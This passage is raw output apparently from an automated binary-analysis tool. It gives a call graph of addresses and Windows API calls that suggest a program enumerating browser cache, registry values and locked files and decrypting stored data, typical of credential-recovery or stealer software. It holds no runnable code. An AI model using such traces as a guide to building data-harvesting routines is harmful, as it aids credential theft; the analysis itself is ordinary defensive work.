38702->39522 38707 409d1f 6 API calls 38703->38707 39521 40a6e6 WideCharToMultiByte 38705->39521 38707->38694 38708 40b827 38708->38705 38709 40b866 38710 444432 120 API calls 38709->38710 38711 40b879 38710->38711 38712 40bad5 38711->38712 38713 40b273 27 API calls 38711->38713 38715 40b04b ??3@YAXPAX 38712->38715 38714 40b89a 38713->38714 38716 438552 133 API calls 38714->38716 38717 40baf3 38715->38717 38718 40b8a4 38716->38718 38717->38198 38719 40bacd 38718->38719 38721 4251c4 136 API calls 38718->38721 38720 443d90 110 API calls 38719->38720 38720->38712 38743 40b8b8 38721->38743 38722 40bac6 39534 424f26 122 API calls 38722->39534 38723 40b8bd memset 39525 425413 17 API calls 38723->39525 38726 425413 17 API calls 38726->38743 38729 40a71b MultiByteToWideChar 38729->38743 38732 40b9b5 memcmp 38732->38743 38733 4099c6 2 API calls 38733->38743 38734 404423 37 API calls 38734->38743 38736 4251c4 136 API calls 38736->38743 38737 40bb3e memset memcpy 39535 40a734 MultiByteToWideChar 38737->39535 38740 40bb88 LocalFree 38740->38743 38743->38722 38743->38723 38743->38726 38743->38729 38743->38732 38743->38733 38743->38734 38743->38736 38743->38737 38744 40ba5f memcmp 38743->38744 38745 40a734 MultiByteToWideChar 38743->38745 39526 4253ef 16 API calls 38743->39526 39527 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38743->39527 39528 4253af 17 API calls 38743->39528 39529 4253cf 17 API calls 38743->39529 39530 447280 memset 38743->39530 39531 447960 memset memcpy memcpy memcpy 38743->39531 39532 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38743->39532 39533 447920 memcpy memcpy memcpy 38743->39533 38744->38743 38745->38743 38746->38276 38748 40aed1 38747->38748 38749 40aec7 FindClose 38747->38749 38748->38213 38749->38748 38751 4099d7 38750->38751 38752 4099da memcpy 38750->38752 38751->38752 38752->38259 38754 40b2cc 27 API calls 38753->38754 38755 44543f 38754->38755 38756 409d1f 6 API calls 38755->38756 38757 44544f 38756->38757 39624 409b98 GetFileAttributesW 38757->39624 38759 44545e 38760 445476 38759->38760 38761 40b6ef 249 API calls 38759->38761 38762 40b2cc 27 API calls 38760->38762 38761->38760 38763 445482 38762->38763 38764 409d1f 6 API calls 38763->38764 38765 445492 38764->38765 39625 409b98 GetFileAttributesW 38765->39625 38767 4454a1 38768 4454b9 38767->38768 38769 40b6ef 249 API calls 38767->38769 38768->38285 38769->38768 38770->38284 38771->38309 38772->38311 38773->38349 38774->38330 38775->38376 38776->38376 38777->38359 38778->38388 38779->38390 38780->38392 38782 414c2e 14 API calls 38781->38782 38783 40c2ae 38782->38783 38837 40c1d3 38783->38837 38788 40c3be 38805 40a8ab 38788->38805 38789 40afcf 2 API calls 38790 40c2fd FindFirstUrlCacheEntryW 38789->38790 38791 40c3b6 38790->38791 38792 40c31e wcschr 38790->38792 38793 40b04b ??3@YAXPAX 38791->38793 38794 40c331 38792->38794 38795 40c35e FindNextUrlCacheEntryW 38792->38795 38793->38788 38797 40a8ab 9 API calls 38794->38797 38795->38792 38796 40c373 GetLastError 38795->38796 38798 40c3ad FindCloseUrlCache 38796->38798 38799 40c37e 38796->38799 38800 40c33e wcschr 38797->38800 38798->38791 38801 40afcf 2 API calls 38799->38801 38800->38795 38802 40c34f 38800->38802 38803 40c391 FindNextUrlCacheEntryW 38801->38803 38804 40a8ab 9 API calls 38802->38804 38803->38792 38803->38798 38804->38795 38953 40a97a 38805->38953 38808 40a8cc 38808->38399 38959 40b1ab free free 38810->38959 38812 40c3dd 38813 40b2cc 27 API calls 38812->38813 38814 40c3e7 38813->38814 38815 40c50e 38814->38815 38816 40c3ff 38814->38816 38830 405337 38815->38830 38817 40a9ce 4 API calls 38816->38817 38818 40c418 memset 38817->38818 38960 40aa1d 38818->38960 38821 40c471 38823 40c47a _wcsupr 38821->38823 38822 40c505 38822->38815 38962 40a8d0 7 API calls 38823->38962 38825 40c498 38963 40a8d0 7 API calls 38825->38963 38827 40c4ac memset 38828 40aa1d 38827->38828 38829 40c4e4 RegEnumValueW 38828->38829 38829->38822 38829->38823 38964 405220 38830->38964 38833->38410 38834->38412 38835->38413 38836->38406 38838 40ae18 9 API calls 38837->38838 38844 40c210 38838->38844 38839 40ae51 9 API calls 38839->38844 38840 40c264 38841 40aebe FindClose 38840->38841 38843 40c26f 38841->38843 38842 40add4 2 API calls 38842->38844 38849 40e5ed memset memset 38843->38849 38844->38839 38844->38840 38844->38842 38845 40c231 _wcsicmp 38844->38845 38846 40c1d3 34 API calls 38844->38846 38845->38844 38847 40c248 38845->38847 38846->38844 38862 40c084 21 API calls 38847->38862 38850 414c2e 14 API calls 38849->38850 38851 40e63f 38850->38851 38852 409d1f 6 API calls 38851->38852 38853 40e658 38852->38853 38863 409b98 GetFileAttributesW 38853->38863 38855 40e667 38856 409d1f 6 API calls 38855->38856 38858 40e680 38855->38858 38856->38858 38864 409b98 GetFileAttributesW 38858->38864 38859 40e68f 38860 40c2d8 38859->38860 38865 40e4b2 38859->38865 38860->38788 38860->38789 38862->38844 38863->38855 38864->38859 38886 40e01e 38865->38886 38867 40e593 38869 40e5b0 38867->38869 38870 40e59c DeleteFileW 38867->38870 38868 40e521 38868->38867 38909 40e175 38868->38909 38871 40b04b ??3@YAXPAX 38869->38871 38870->38869 38872 40e5bb 38871->38872 38874 40e5c4 CloseHandle 38872->38874 38875 40e5cc 38872->38875 38874->38875 38877 40b633 free 38875->38877 38876 40e573 38878 40e584 38876->38878 38879 40e57c CloseHandle 38876->38879 38880 40e5db 38877->38880 38952 40b1ab free free 38878->38952 38879->38878 38883 40b633 free 38880->38883 38882 40e540 38882->38876 38929 40e2ab 38882->38929 38884 40e5e3 38883->38884 38884->38860 38887 406214 22 API calls 38886->38887 38888 40e03c 38887->38888 38889 40e16b 38888->38889 38890 40dd85 74 API calls 38888->38890 38889->38868 38891 40e06b 38890->38891 38891->38889 38892 40afcf ??2@YAPAXI ??3@YAXPAX 38891->38892 38893 40e08d OpenProcess 38892->38893 38894 40e0a4 GetCurrentProcess DuplicateHandle 38893->38894 38898 40e152 38893->38898 38895 40e0d0 GetFileSize 38894->38895 38896 40e14a CloseHandle 38894->38896 38899 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38895->38899 38896->38898 38897 40e160 38901 40b04b ??3@YAXPAX 38897->38901 38898->38897 38900 406214 22 API calls 38898->38900 38902 40e0ea 38899->38902 38900->38897 38901->38889 38903 4096dc CreateFileW 38902->38903 38904 40e0f1 CreateFileMappingW 38903->38904 38905 40e140 CloseHandle CloseHandle 38904->38905 38906 40e10b MapViewOfFile 38904->38906 38905->38896 38907 40e13b CloseHandle 38906->38907 38908 40e11f WriteFile UnmapViewOfFile 38906->38908 38907->38905 38908->38907 38910 40e18c 38909->38910 38911 406b90 11 API calls 38910->38911 38912 40e19f 38911->38912 38913 40e1a7 memset 38912->38913 38914 40e299 38912->38914 38919 40e1e8 38913->38919 38915 4069a3 ??3@YAXPAX free 38914->38915 38916 40e2a4 38915->38916 38916->38882 38917 406e8f 13 API calls 38917->38919 38918 406b53 SetFilePointerEx ReadFile 38918->38919 38919->38917 38919->38918 38920 40dd50 _wcsicmp 38919->38920 38921 40e283 38919->38921 38925 40742e 8 API calls 38919->38925 38926 40aae3 wcslen wcslen _memicmp 38919->38926 38927 40e244 _snwprintf 38919->38927 38920->38919 38922 40e291 38921->38922 38923 40e288 free 38921->38923 38924 40aa04 free 38922->38924 38923->38922 38924->38914 38925->38919 38926->38919 38928 40a8d0 7 API calls 38927->38928 38928->38919 38930 40e2c2 38929->38930 38931 406b90 11 API calls 38930->38931 38947 40e2d3 38931->38947 38932 40e4a0 38933 4069a3 ??3@YAXPAX free 38932->38933 38934 40e4ab 38933->38934 38934->38882 38935 406e8f 13 API calls 38935->38947 38936 406b53 SetFilePointerEx ReadFile 38936->38947 38937 40e489 38938 40aa04 free 38937->38938 38939 40e491 38938->38939 38939->38932 38940 40e497 free 38939->38940 38940->38932 38941 40dd50 _wcsicmp 38941->38947 38942 40dd50 _wcsicmp 38943 40e376 memset 38942->38943 38944 40aa29 6 API calls 38943->38944 38944->38947 38945 40742e 8 API calls 38945->38947 38946 40e3e0 memcpy 38946->38947 38947->38932 38947->38935 38947->38936 38947->38937 38947->38941 38947->38942 38947->38945 38947->38946 38948 40e3b3 wcschr 38947->38948 38949 40e3fb memcpy 38947->38949 38950 40e416 memcpy 38947->38950 38951 40e431 memcpy 38947->38951 38948->38947 38949->38947 38950->38947 38951->38947 38952->38867 38956 40a980 38953->38956 38954 40a995 _wcsicmp 38954->38956 38955 40a99c wcscmp 38955->38956 38956->38954 38956->38955 38957 40a8bb 38956->38957 38957->38808 38958 40a8d0 7 API calls 38957->38958 38958->38808 38959->38812 38961 40aa23 RegEnumValueW 38960->38961 38961->38821 38961->38822 38962->38825 38963->38827 38965 405335 38964->38965 38966 40522a 38964->38966 38965->38413 38967 40b2cc 27 API calls 38966->38967 38968 405234 38967->38968 38969 40a804 8 API calls 38968->38969 38970 40523a 38969->38970 39009 40b273 38970->39009 38972 405248 _mbscpy _mbscat GetProcAddress 38973 40b273 27 API calls 38972->38973 38974 405279 38973->38974 39012 405211 GetProcAddress 38974->39012 38976 405282 38977 40b273 27 API calls 38976->38977 38978 40528f 38977->38978 39013 405211 GetProcAddress 38978->39013 38980 405298 38981 40b273 27 API calls 38980->38981 38982 4052a5 38981->38982 39014 405211 GetProcAddress 38982->39014 38984 4052ae 38985 40b273 27 API calls 38984->38985 38986 4052bb 38985->38986 39015 405211 GetProcAddress 38986->39015 38988 4052c4 38989 40b273 27 API calls 38988->38989 38990 4052d1 38989->38990 39016 405211 GetProcAddress 38990->39016 38992 4052da 38993 40b273 27 API calls 38992->38993 38994 4052e7 38993->38994 39017 405211 GetProcAddress 38994->39017 38996 4052f0 38997 40b273 27 API calls 38996->38997 38998 4052fd 38997->38998 39018 405211 GetProcAddress 38998->39018 39000 405306 39001 40b273 27 API calls 39000->39001 39002 405313 39001->39002 39019 405211 GetProcAddress 39002->39019 39004 40531c 39005 40b273 27 API calls 39004->39005 39006 405329 39005->39006 39020 405211 GetProcAddress 39006->39020 39008 405332 39008->38965 39010 40b58d 27 API calls 39009->39010 39011 40b18c 39010->39011 39011->38972 39012->38976 39013->38980 39014->38984 39015->38988 39016->38992 39017->38996 39018->39000 39019->39004 39020->39008 39022 40440c FreeLibrary 39021->39022 39023 40436d 39022->39023 39024 40a804 8 API calls 39023->39024 39025 404377 39024->39025 39026 404383 39025->39026 39027 404405 39025->39027 39028 40b273 27 API calls 39026->39028 39027->38418 39027->38420 39027->38421 39029 40438d GetProcAddress 39028->39029 39030 40b273 27 API calls 39029->39030 39031 4043a7 GetProcAddress 39030->39031 39032 40b273 27 API calls 39031->39032 39033 4043ba GetProcAddress 39032->39033 39034 40b273 27 API calls 39033->39034 39035 4043ce GetProcAddress 39034->39035 39036 40b273 27 API calls 39035->39036 39037 4043e2 GetProcAddress 39036->39037 39038 4043f1 39037->39038 39039 4043f7 39038->39039 39040 40440c FreeLibrary 39038->39040 39039->39027 39040->39027 39042 404413 FreeLibrary 39041->39042 39043 40441e 39041->39043 39042->39043 39043->38435 39044->38431 39046 40442e 39045->39046 39047 40447e 39045->39047 39048 40b2cc 27 API calls 39046->39048 39047->38431 39049 404438 39048->39049 39050 40a804 8 API calls 39049->39050 39051 40443e 39050->39051 39052 404445 39051->39052 39053 404467 39051->39053 39054 40b273 27 API calls 39052->39054 39053->39047 39056 404475 FreeLibrary 39053->39056 39055 40444f GetProcAddress 39054->39055 39055->39053 39057 404460 39055->39057 39056->39047 39057->39053 39059 4135f6 39058->39059 39060 4135eb FreeLibrary 39058->39060 39059->38438 39060->39059 39062 4449c4 39061->39062 39063 444a52 39061->39063 39064 40b2cc 27 API calls 39062->39064 39063->38455 39063->38460 39065 4449cb 39064->39065 39066 40a804 8 API calls 39065->39066 39067 4449d1 39066->39067 39068 40b273 27 API calls 39067->39068 39069 4449dc GetProcAddress 39068->39069 39070 40b273 27 API calls 39069->39070 39071 4449f3 GetProcAddress 39070->39071 39072 40b273 27 API calls 39071->39072 39073 444a04 GetProcAddress 39072->39073 39074 40b273 27 API calls 39073->39074 39075 444a15 GetProcAddress 39074->39075 39076 40b273 27 API calls 39075->39076 39077 444a26 GetProcAddress 39076->39077 39078 40b273 27 API calls 39077->39078 39079 444a37 GetProcAddress 39078->39079 39080 40b273 27 API calls 39079->39080 39081 444a48 GetProcAddress 39080->39081 39081->39063 39082->38466 39083->38466 39084->38466 39085->38466 39086->38456 39088 403a29 39087->39088 39102 403bed memset memset 39088->39102 39090 403ae7 39115 40b1ab free free 39090->39115 39091 403a3f memset 39096 403a2f 39091->39096 39093 403aef 39093->38474 39094 40a8d0 7 API calls 39094->39096 39095 409d1f 6 API calls 39095->39096 39096->39090 39096->39091 39096->39094 39096->39095 39097 409b98 GetFileAttributesW 39096->39097 39097->39096 39099 40a051 GetFileTime CloseHandle 39098->39099 39100 4039ca CompareFileTime 39098->39100 39099->39100 39100->38474 39101->38473 39103 414c2e 14 API calls 39102->39103 39104 403c38 39103->39104 39105 409719 2 API calls 39104->39105 39106 403c3f wcscat 39105->39106 39107 414c2e 14 API calls 39106->39107 39108 403c61 39107->39108 39109 409719 2 API calls 39108->39109 39110 403c68 wcscat 39109->39110 39116 403af5 39110->39116 39113 403af5 20 API calls 39114 403c95 39113->39114 39114->39096 39115->39093 39117 403b02 39116->39117 39118 40ae18 9 API calls 39117->39118 39126 403b37 39118->39126 39119 403bdb 39120 40aebe FindClose 39119->39120 39121 403be6 39120->39121 39121->39113 39122 40ae18 9 API calls 39122->39126 39123 40ae51 9 API calls 39123->39126 39124 40aebe FindClose 39124->39126 39125 40add4 wcscmp wcscmp 39125->39126 39126->39119 39126->39122 39126->39123 39126->39124 39126->39125 39127 40a8d0 7 API calls 39126->39127 39127->39126 39129 409d1f 6 API calls 39128->39129 39130 404190 39129->39130 39143 409b98 GetFileAttributesW 39130->39143 39132 40419c 39133 4041a7 6 API calls 39132->39133 39134 40435c 39132->39134 39135 40424f 39133->39135 39134->38500 39135->39134 39137 40425e memset 39135->39137 39139 409d1f 6 API calls 39135->39139 39140 40a8ab 9 API calls 39135->39140 39144 414842 39135->39144 39137->39135 39138 404296 wcscpy 39137->39138 39138->39135 39139->39135 39141 4042b6 memset memset _snwprintf wcscpy 39140->39141 39141->39135 39142->38498 39143->39132 39147 41443e 39144->39147 39146 414866 39146->39135 39148 41444b 39147->39148 39149 414451 39148->39149 39150 4144a3 GetPrivateProfileStringW 39148->39150 39151 414491 39149->39151 39152 414455 wcschr 39149->39152 39150->39146 39154 414495 WritePrivateProfileStringW 39151->39154 39152->39151 39153 414463 _snwprintf 39152->39153 39153->39154 39154->39146 39155->38504 39157 40b2cc 27 API calls 39156->39157 39158 409615 39157->39158 39159 409d1f 6 API calls 39158->39159 39160 409625 39159->39160 39185 409b98 GetFileAttributesW 39160->39185 39162 409634 39163 409648 39162->39163 39186 4091b8 memset 39162->39186 39164 40b2cc 27 API calls 39163->39164 39167 408801 39163->39167 39166 40965d 39164->39166 39168 409d1f 6 API calls 39166->39168 39167->38507 39167->38534 39169 40966d 39168->39169 39238 409b98 GetFileAttributesW 39169->39238 39171 40967c 39171->39167 39172 409681 39171->39172 39239 409529 72 API calls 39172->39239 39174 409690 39174->39167 39175->38529 39176->38534 39177->38535 39178->38534 39179->38540 39185->39162 39240 40a6e6 WideCharToMultiByte 39186->39240 39188 409202 39241 444432 39188->39241 39191 40b273 27 API calls 39192 409236 39191->39192 39287 438552 39192->39287 39195 409383 39197 40b273 27 API calls 39195->39197 39199 409399 39197->39199 39198 409254 39200 40937b 39198->39200 39308 4253cf 17 API calls 39198->39308 39201 438552 133 API calls 39199->39201 39312 424f26 122 API calls 39200->39312 39220 4093a3 39201->39220 39204 409267 39309 4253cf 17 API calls 39204->39309 39205 4094ff 39316 443d90 39205->39316 39208 4251c4 136 API calls 39208->39220 39209 409273 39310 4253af 17 API calls 39209->39310 39210 409507 39218 40951d 39210->39218 39336 408f2f 77 API calls 39210->39336 39212 4093df 39315 424f26 122 API calls 39212->39315 39214 4253cf 17 API calls 39214->39220 39218->39163 39220->39205 39220->39208 39220->39212 39220->39214 39222 4093e4 39220->39222 39313 4253af 17 API calls 39222->39313 39228 4093ed 39314 4253af 17 API calls 39228->39314 39231 4093f9 39231->39212 39232 409409 memcmp 39231->39232 39232->39212 39233 409421 memcmp 39232->39233 39234 4094a4 memcmp 39233->39234 39235 409435 39233->39235 39234->39212 39237 4094b8 memcpy memcpy 39234->39237 39235->39212 39236 409442 memcpy memcpy memcpy 39235->39236 39236->39212 39237->39212 39238->39171 39239->39174 39240->39188 39337 4438b5 39241->39337 39243 44444c 39244 409215 39243->39244 39351 415a6d 39243->39351 39244->39191 39244->39218 39247 444486 39249 4444b9 memcpy 39247->39249 39286 4444a4 39247->39286 39248 44469e 39248->39244 39251 443d90 110 API calls 39248->39251 39355 415258 39249->39355 39251->39244 39252 444524 39253 444541 39252->39253 39254 44452a 39252->39254 39358 444316 39253->39358 39392 416935 39254->39392 39258 444316 18 API calls 39259 444563 39258->39259 39260 444316 18 API calls 39259->39260 39261 44456f 39260->39261 39262 444316 18 API calls 39261->39262 39263 44457f 39262->39263 39263->39286 39372 432d4e 39263->39372 39266 444316 18 API calls 39267 4445b0 39266->39267 39376 41eed2 39267->39376 39405 4442e6 11 API calls 39286->39405 39406 438460 39287->39406 39289 409240 39289->39195 39290 4251c4 39289->39290 39418 424f07 39290->39418 39292 4251e4 39293 4251f7 39292->39293 39294 4251e8 39292->39294 39426 4250f8 39293->39426 39425 4446ea 11 API calls 39294->39425 39296 4251f2 39296->39198 39298 425209 39301 425249 39298->39301 39304 4250f8 126 API calls 39298->39304 39305 425287 39298->39305 39434 4384e9 134 API calls 39298->39434 39435 424f74 123 API calls 39298->39435 39301->39305 39436 424ff0 13 API calls 39301->39436 39304->39298 39438 415c7d 16 API calls 39305->39438 39306 425266 39306->39305 39437 415be9 memcpy 39306->39437 39308->39204 39309->39209 39312->39195 39313->39228 39314->39231 39315->39205 39317 443da3 39316->39317 39318 443db6 39316->39318 39439 41707a 11 API calls 39317->39439 39318->39210 39320 443da8 39321 443dbc 39320->39321 39322 443dac 39320->39322 39441 4300e8 memset memset memcpy 39321->39441 39440 4446ea 11 API calls 39322->39440 39325 443dce 39327 443de0 39325->39327 39329 443e22 39325->39329 39328 443e5a 39329->39328 39442 41f0ac 102 API calls 39329->39442 39336->39218 39338 4438d0 39337->39338 39347 4438c9 39337->39347 39339 415378 memcpy memcpy 39338->39339 39340 4438d5 39339->39340 39341 4154e2 10 API calls 39340->39341 39342 443906 39340->39342 39340->39347 39341->39342 39343 443970 memset 39342->39343 39342->39347 39346 44398b 39343->39346 39344 4439a0 39345 415700 10 API calls 39344->39345 39344->39347 39349 4439c0 39345->39349 39346->39344 39348 41975c 10 API calls 39346->39348 39347->39243 39348->39344 39349->39347 39350 418981 10 API calls 39349->39350 39350->39347 39352 415a77 39351->39352 39353 415a8d 39352->39353 39354 415a7e memset 39352->39354 39353->39247 39354->39353 39356 4438b5 11 API calls 39355->39356 39357 41525d 39356->39357 39357->39252 39359 444328 39358->39359 39360 444423 39359->39360 39361 44434e 39359->39361 39363 4446ea 11 API calls 39360->39363 39362 432d4e memset memset memcpy 39361->39362 39364 44435a 39362->39364 39369 444381 39363->39369 39366 444375 39364->39366 39371 44438b 39364->39371 39365 432d4e memset memset memcpy 39367 4443ec 39365->39367 39368 416935 16 API calls 39366->39368 39367->39369 39370 416935 16 API calls 39367->39370 39368->39369 39369->39258 39370->39369 39371->39365 39373 432d65 39372->39373 39374 432d58 39372->39374 39373->39266 39375 432cc4 memset memset memcpy 39374->39375 39375->39373 39393 41693e 39392->39393 39397 41698e 39392->39397 39394 41694c 39393->39394 39395 422fd1 memset 39393->39395 39396 4165a0 11 API calls 39394->39396 39394->39397 39395->39394 39398 416972 39396->39398 39397->39286 39398->39397 39399 422b84 15 API calls 39398->39399 39399->39397 39405->39248 39407 41703f 11 API calls 39406->39407 39408 43847a 39407->39408 39409 43848a 39408->39409 39410 43847e 39408->39410 39412 438270 133 API calls 39409->39412 39411 4446ea 11 API calls 39410->39411 39414 438488 39411->39414 39413 4384aa 39412->39413 39413->39414 39415 424f26 122 API calls 39413->39415 39414->39289 39416 4384bb 39415->39416 39417 438270 133 API calls 39416->39417 39417->39414 39419 424f1f 39418->39419 39420 424f0c 39418->39420 39422 424eea 11 API calls 39419->39422 39421 416760 11 API calls 39420->39421 39423 424f18 39421->39423 39424 424f24 39422->39424 39423->39292 39424->39292 39425->39296 39427 425108 39426->39427 39433 42510d 39426->39433 39428 424f74 123 API calls 39427->39428 39428->39433 39429 42569b 124 API calls 39430 42516e 39429->39430 39432 415c7d 16 API calls 39430->39432 39431 425115 39431->39298 39432->39431 39433->39429 39433->39431 39434->39298 39435->39298 39436->39306 39437->39305 39438->39296 39439->39320 39440->39318 39441->39325 39442->39329 39472 413f4f 39445->39472 39448 413f37 K32GetModuleFileNameExW 39449 413f4a 39448->39449 39449->38567 39451 413969 wcscpy 39450->39451 39452 41396c wcschr 39450->39452 39464 413a3a 39451->39464 39452->39451 39454 41398e 39452->39454 39477 4097f7 wcslen wcslen _memicmp 39454->39477 39456 41399a 39457 4139a4 memset 39456->39457 39458 4139e6 39456->39458 39478 409dd5 GetWindowsDirectoryW wcscpy 39457->39478 39460 413a31 wcscpy 39458->39460 39461 4139ec memset 39458->39461 39460->39464 39479 409dd5 GetWindowsDirectoryW wcscpy 39461->39479 39462 4139c9 wcscpy wcscat 39462->39464 39464->38567 39465 413a11 memcpy wcscat 39465->39464 39467 413cb0 GetModuleHandleW 39466->39467 39468 413cda 39466->39468 39467->39468 39469 413cbf GetProcAddress 39467->39469 39470 413ce3 GetProcessTimes 39468->39470 39471 413cf6 39468->39471 39469->39468 39470->38569 39471->38569 39473 413f2f 39472->39473 39474 413f54 39472->39474 39473->39448 39473->39449 39475 40a804 8 API calls 39474->39475 39476 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39475->39476 39476->39473 39477->39456 39478->39462 39479->39465 39480->38589 39481->38613 39483 409cf9 GetVersionExW 39482->39483 39484 409d0a 39482->39484 39483->39484 39484->38619 39484->38622 39485->38626 39486->38628 39487->38695 39489 40bba5 39488->39489 39536 40cc26 39489->39536 39492 40bd4b 39557 40cc0c 39492->39557 39497 40b2cc 27 API calls 39498 40bbef 39497->39498 39564 40ccf0 _wcsicmp 39498->39564 39500 40bbf5 39500->39492 39565 40ccb4 6 API calls 39500->39565 39502 40bc26 39503 40cf04 17 API calls 39502->39503 39504 40bc2e 39503->39504 39505 40bd43 39504->39505 39506 40b2cc 27 API calls 39504->39506 39507 40cc0c 4 API calls 39505->39507 39508 40bc40 39506->39508 39507->39492 39566 40ccf0 _wcsicmp 39508->39566 39510 40bc46 39510->39505 39511 40bc61 memset memset WideCharToMultiByte 39510->39511 39567 40103c strlen 39511->39567 39513 40bcc0 39514 40b273 27 API calls 39513->39514 39515 40bcd0 memcmp 39514->39515 39515->39505 39516 40bce2 39515->39516 39517 404423 37 API calls 39516->39517 39518 40bd10 39517->39518 39518->39505 39519 40bd3a LocalFree 39518->39519 39520 40bd1f memcpy 39518->39520 39519->39505 39520->39519 39521->38709 39523 409a74 GetTempFileNameW 39522->39523 39524 409a66 GetWindowsDirectoryW 39522->39524 39523->38708 39524->39523 39525->38743 39526->38743 39527->38743 39528->38743 39529->38743 39530->38743 39531->38743 39532->38743 39533->38743 39534->38719 39535->38740 39568 4096c3 CreateFileW 39536->39568 39538 40cc34 39539 40cc3d GetFileSize 39538->39539 39547 40bbca 39538->39547 39540 40afcf 2 API calls 39539->39540 39541 40cc64 39540->39541 39569 40a2ef ReadFile 39541->39569 39543 40cc71 39570 40ab4a MultiByteToWideChar 39543->39570 39545 40cc95 CloseHandle 39546 40b04b ??3@YAXPAX 39545->39546 39546->39547 39547->39492 39548 40cf04 39547->39548 39549 40b633 free 39548->39549 39550 40cf14 39549->39550 39576 40b1ab free free 39550->39576 39552 40bbdd 39552->39492 39552->39497 39553 40cf1b 39553->39552 39555 40cfef 39553->39555 39577 40cd4b 39553->39577 39556 40cd4b 14 API calls 39555->39556 39556->39552 39558 40b633 free 39557->39558 39559 40cc15 39558->39559 39560 40aa04 free 39559->39560 39561 40cc1d 39560->39561 39623 40b1ab free free 39561->39623 39563 40b7d4 memset CreateFileW 39563->38701 39563->38702 39564->39500 39565->39502 39566->39510 39567->39513 39568->39538 39569->39543 39571 40ab93 39570->39571 39572 40ab6b 39570->39572 39571->39545 39573 40a9ce 4 API calls 39572->39573 39574 40ab74 39573->39574 39575 40ab7c MultiByteToWideChar 39574->39575 39575->39571 39576->39553 39578 40cd7b 39577->39578 39611 40aa29 6 API calls 39578->39611 39580 40cef5 39581 40aa04 free 39580->39581 39582 40cefd 39581->39582 39582->39553 39583 40cd89 39583->39580 39612 40aa29 6 API calls 39583->39612 39585 40ce1d 39613 40aa29 6 API calls 39585->39613 39587 40ce3e 39588 40ce6a 39587->39588 39614 40abb7 wcslen memmove 39587->39614 39589 40ce9f 39588->39589 39617 40abb7 wcslen memmove 39588->39617 39620 40a8d0 7 API calls 39589->39620 39593 40ce56 39615 40aa71 wcslen 39593->39615 39594 40ce8b 39618 40aa71 wcslen 39594->39618 39595 40ceb5 39621 40a8d0 7 API calls 39595->39621 39598 40ce5e 39616 40abb7 wcslen memmove 39598->39616 39599 40ce93 39619 40abb7 wcslen memmove 39599->39619 39603 40cecb 39622 40d00b malloc memcpy free free 39603->39622 39605 40cedd 39606 40aa04 free 39605->39606 39607 40cee5 39606->39607 39608 40aa04 free 39607->39608 39609 40ceed 39608->39609 39610 40aa04 free 39609->39610 39610->39580 39611->39583 39612->39585 39613->39587 39614->39593 39615->39598 39616->39588 39617->39594 39618->39599 39619->39589 39620->39595 39621->39603 39622->39605 39623->39563 39624->38759 39625->38767 37544 44dea5 37545 44deb5 FreeLibrary 37544->37545 37546 44dec3 37544->37546 37545->37546 39635 4148b6 FindResourceW 39636 4148cf SizeofResource 39635->39636 39639 4148f9 39635->39639 39637 4148e0 LoadResource 39636->39637 39636->39639 39638 4148ee LockResource 39637->39638 39637->39639 39638->39639 37720 415304 free 39640 441b3f 39650 43a9f6 39640->39650 39642 441b61 39823 4386af memset 39642->39823 39644 44189a 39645 442bd4 39644->39645 39646 4418e2 39644->39646 39647 4418ea 39645->39647 39825 441409 memset 39645->39825 39646->39647 39824 4414a9 12 API calls 39646->39824 39651 43aa20 39650->39651 39652 43aadf 39650->39652 39651->39652 39653 43aa34 memset 39651->39653 39652->39642 39654 43aa56 39653->39654 39655 43aa4d 39653->39655 39826 43a6e7 39654->39826 39834 42c02e memset 39655->39834 39660 43aad3 39836 4169a7 11 API calls 39660->39836 39661 43aaae 39661->39652 39661->39660 39676 43aae5 39661->39676 39662 43ac18 39665 43ac47 39662->39665 39838 42bbd5 memcpy memcpy memcpy memset memcpy 39662->39838 39666 43aca8 39665->39666 39839 438eed 16 API calls 39665->39839 39670 43acd5 39666->39670 39841 4233ae 11 API calls 39666->39841 39669 43ac87 39840 4233c5 16 API calls 39669->39840 39842 423426 11 API calls 39670->39842 39674 43ace1 39843 439811 162 API calls 39674->39843 39675 43a9f6 160 API calls 39675->39676 39676->39652 39676->39662 39676->39675 39837 439bbb 22 API calls 39676->39837 39678 43acfd 39683 43ad2c 39678->39683 39844 438eed 16 API calls 39678->39844 39680 43ad19 39845 4233c5 16 API calls 39680->39845 39682 43ad58 39846 44081d 162 API calls 39682->39846 39683->39682 39686 43add9 39683->39686 39850 423426 11 API calls 39686->39850 39687 43ae3a memset 39688 43ae73 39687->39688 39851 42e1c0 146 API calls 39688->39851 39689 43adab 39848 438c4e 162 API calls 39689->39848 39690 43ad6c 39690->39652 39690->39689 39847 42370b memset memcpy memset 39690->39847 39694 43adcc 39849 440f84 12 API calls 39694->39849 39695 43ae96 39852 42e1c0 146 API calls 39695->39852 39698 43aea8 39699 43aec1 39698->39699 39853 42e199 146 API calls 39698->39853 39700 43af00 39699->39700 39854 42e1c0 146 API calls 39699->39854 39700->39652 39704 43af1a 39700->39704 39705 43b3d9 39700->39705 39855 438eed 16 API calls 39704->39855 39710 43b3f6 39705->39710 39714 43b4c8 39705->39714 39706 43b60f 39706->39652 39914 4393a5 17 API calls 39706->39914 39709 43af2f 39856 4233c5 16 API calls 39709->39856 39896 432878 12 API calls 39710->39896 39712 43af51 39857 423426 11 API calls 39712->39857 39720 43b4f2 39714->39720 39902 42bbd5 memcpy memcpy memcpy memset memcpy 39714->39902 39716 43af7d 39858 423426 11 API calls 39716->39858 39903 43a76c 21 API calls 39720->39903 39721 43b529 39904 44081d 162 API calls 39721->39904 39722 43b462 39898 423330 11 API calls 39722->39898 39723 43af94 39859 423330 11 API calls 39723->39859 39727 43afca 39860 423330 11 API calls 39727->39860 39728 43b47e 39732 43b497 39728->39732 39899 42374a memcpy memset memcpy memcpy memcpy 39728->39899 39729 43b544 39733 43b55c 39729->39733 39905 42c02e memset 39729->39905 39730 43b428 39730->39722 39897 432b60 16 API calls 39730->39897 39900 4233ae 11 API calls 39732->39900 39906 43a87a 162 API calls 39733->39906 39735 43afdb 39861 4233ae 11 API calls 39735->39861 39740 43b56c 39744 43b58a 39740->39744 39907 423330 11 API calls 39740->39907 39741 43b4b1 39901 423399 11 API calls 39741->39901 39743 43afee 39862 44081d 162 API calls 39743->39862 39908 440f84 12 API calls 39744->39908 39745 43b4c1 39910 42db80 162 API calls 39745->39910 39750 43b592 39909 43a82f 16 API calls 39750->39909 39753 43b5b4 39911 438c4e 162 